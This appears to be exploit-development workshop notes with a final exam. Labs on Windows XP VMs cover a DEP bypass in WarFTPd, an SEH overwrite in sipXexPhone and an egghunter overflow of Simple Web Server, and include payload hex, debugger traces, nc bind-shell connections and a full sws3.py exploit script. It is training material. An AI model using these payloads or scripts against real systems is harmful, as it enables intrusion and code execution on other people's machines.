PUSH 2
POP ESI
JE ntdll.7


./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll

[DLLs/xpsp3/ntdll.dll]
0x7c91cd24 3c016a025e0f84
0x7c91cd24      cmp al, 1
0x7c91cd26      push 2
0x7c91cd28      pop esi
0x7c91cd29      jz 7


This set of instructions makes sure that AL is set to 1, 2 is pushed
on the stack then popped into ESI.


dep = "\x0e\xe0\x5e\x77"+\
"\xff\xff\xff\xff"+\
"\x24\xcd\x91\x7c"+\
"\xff\xff\xff\xff"+\
"A"*0x54


    #############################
    # Start WarFTPd             #
    # Start WinDBG              #
    # Press F6                  #
    # Attach to war-ftpd.exe    #
    # bp 0x775ee00e             #
    # g                         #
    #############################


python warftpd5.py | nc XPSP3-ED-Target-IP 21

---------------------------------------------------------------------------
We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.

    mov al,0x1
    ret 0x4


0:005> g
Breakpoint 0 hit
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
ole32!CSSMappedStream::IsWriteable:
775ee00e b001            mov     al,1


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
ole32!CSSMappedStream::IsWriteable+0x2:
775ee010 c20400          ret     4


---------------------------------------------------------------------------
Ok, so inside of ntdll.dll we need to find the following instructions:

    CMP AL,1
    PUSH 2
    POP ESI
    JE ntdll.7

0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
ntdll!LdrpCheckNXCompatibility+0x13:
7c91cd24 3c01            cmp     al,1


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpCheckNXCompatibility+0x15:
7c91cd26 6a02            push    2


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpCheckNXCompatibility+0x17:
7c91cd28 5e              pop     esi


0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpCheckNXCompatibility+0x18:
7c91cd29 0f84df290200    je      ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]


---------------------------------------------------------------------------


python warftpd5.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444


##########################
# Lab 1c: SEH Overwrites #
##########################

    #################################################
    # On our VictimXP Host (XPSP3-ED-Target-IP)     #
    # Start sipXexPhone if it isn’t already running #
    # Start WinDBG                                  #
    # Press “F6” and Attach to sipXexPhone.exe      #
    # Press “F5” to start the debugger              #
    #################################################


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete


python sipex0.py XPSP3-ED-Target-IP

    0:003> !exchain
    0:003> dds esp
    0:003> dds

python sipex1.py XPSP3-ED-Target-IP

    0:003> !exchain
    0:003> g

    When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.


python sipex2.py XPSP3-ED-Target-IP

    0:003> !exchain
    0:003> g


    ***ssh into instructor Ubuntu host***
    cd /home/strategicsec/toolz/metasploit/tools/exploit
    ruby pattern_offset.rb 41346941             We should see that SEH is at 252


    !load narly
    !nmod

    ***ssh into the Ubuntu host***
    ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
    cd /home/strategicsec/toolz/metasploit/
    ./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll


    #####################################
    # sipex3.py in Notepad++.           #
    # Set cseq = 252                    #
    # Set seh2 address to: 0x10015977   #
    #####################################


python sipex3.py XPSP3-ED-Target-IP
    0:003> !exchain

python sipex4.py XPSP3-ED-Target-IP


nc XPSP3-ED-Target-IP 4444


Brush up on the basics of Structured Exception Handlers:
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


Here are the slides for the exploit dev basics:
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx


Here are the exploit dev basic videos:
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv


Recommended videos on Structured Exception Handling:
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


########################################
# Lab 2a: Not Enough Space (Egghunter) #
########################################

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton

SWS - SIMPLE WEB SERVER
-----------------------

Running SWS on Strategicsec-XP-ED-Target-VM
Start > Programs > Simple Web Server (it's in the middle somewhere)
Red icon in system tray
Double click it
- it will pop up a menu
- select "start"
- dialog box shows starting params - port 82

WinDBG
- attach to "server.exe"


python sws1.py | nc XPSP3-ED-Target-IP 82


python sws2.py | nc XPSP3-ED-Target-IP 82


SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
cd /home/strategicsec/toolz/metasploit/tools/exploit
ruby pattern_offset.rb 41356841             <------- You should see that EIP is at 225
ruby pattern_offset.rb 68413668             <------- You should see that ESP is at 229


EGGHUNTER:
----------

"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
          ^^^^^^^^^^^^^^^^
               ABBA
                                         JMP ESP
                                        /
                                       /
GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)


-----sws3.py-----
#!/usr/bin/python2

import os # for output setting
import sys
import struct # for pack function

# turn off output buffer and set binary mode
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)


pad = "A" * 225        # distance to EIP
eip = 0x7e429353       # replace EIP to point to "jmp esp" from user32.dll

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

shellcode = "\xCC" * 700

buf = "GET /"
buf += pad + struct.pack('<I', eip) + egghunter
buf += " HTTP/1.0\r\n"
buf += "User-Agent: ABBAABBA"
buf += shellcode
buf += " HTTP/1.0\r\n"

sys.stdout.write(buf)
-----


####################
# Day 5 Final Exam #
####################


Section 1: Secure Coding
------------------------


Section 1a: Secure C/C++
------------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03c-Common-Vulnerabilities-in-C-and-C%2B%2B.ppt
Review slides:
	4 - 17
	24 - 31

1. The majority of buffer overflows are related to "_____________"
2. Using the >> operator in C++ with native C strings is just as dangerous as "_____________".
3. The "_____________" versions of functions, such as strncpy(), are headed in the right direction. But, there are still plenty of misuse and abuse cases that either lead to buffer overflows
4. The "_____________" function is misleading because it doesn't accept a bound on the total size of the destination buffer, but rather the remaining space available in the destination buffer
5. List 10 "Always Dangerous" functions or "banned API" and each functions corresponding "Safe C and C++ Library"


Section 1b: Secure Java
-----------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03j-Common-Vulnerabilities-in-Java.ppt
Review slides:
	34 - 58
	70 - 85

1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
2. If outputting normal text, use "_____________". Simple and secure.
3. If outputting inside a non-text tag, use "_____________".
4. Stored procedure gives "_____________". Implement with "_____________".
5. For parameters, use a "_____________". Simple and secure. For non-parameters, use "_____________".


Section 1c: Secure .Net
-----------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03n-Common-Vulnerabilities-in-dot-Net.ppt
Review slides:
	34 - 47
	49 - 60
	89 - 103

1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
2. List the 7 AntiXss Library Functions and when they should be used.
3. In pairs, write "_____________". Returns a safe value. Throws ValidationException if no safe value is found
4. In pairs, use "_____________" to fix command injection.
	Takes user data
	Returns legal value or throws ValidationException
5. List the 3 "Harder to Fix" Command Injection items


Section 2: Web Application Security Testing
-------------------------------------------

Perform a web Application Security Assessment against the following URL:
http://zero.webappsecurity.com

Task 2a: Create a web application security test report similar to the reports found in the link below:
https://s3.amazonaws.com/infosecaddictsfiles/WebAppSampleReports.zip

Task 2b: Create a document to prove that you properly tested the website for the OWASP Top 10 vulnerabilities similar to the report found in the link below:
https://s3.amazonaws.com/infosecaddictsfiles/OWASP-Top-10-Proof_Draft_Update.docx


Section 3: Exploit Development
------------------------------


Task 3a: Analysze and comment exploit code found https://www.exploit-db.com/exploits/23243/ (ensure all components of this exploit code are thoroughly explained)


Task 3b: Create a working exploit for FreeFloat FTP
Use the war-ftp exploit code for reference and the Windows XP virtual machine as the target system.
Download and install FreeFloat FTP Server to the target Windows XP virtual machine and create a working exploit.


Vulnerable FreeFloat FTP Server Download link:
https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip

FreeFloat FTP Server reference code:
https://www.exploit-db.com/exploits/23243/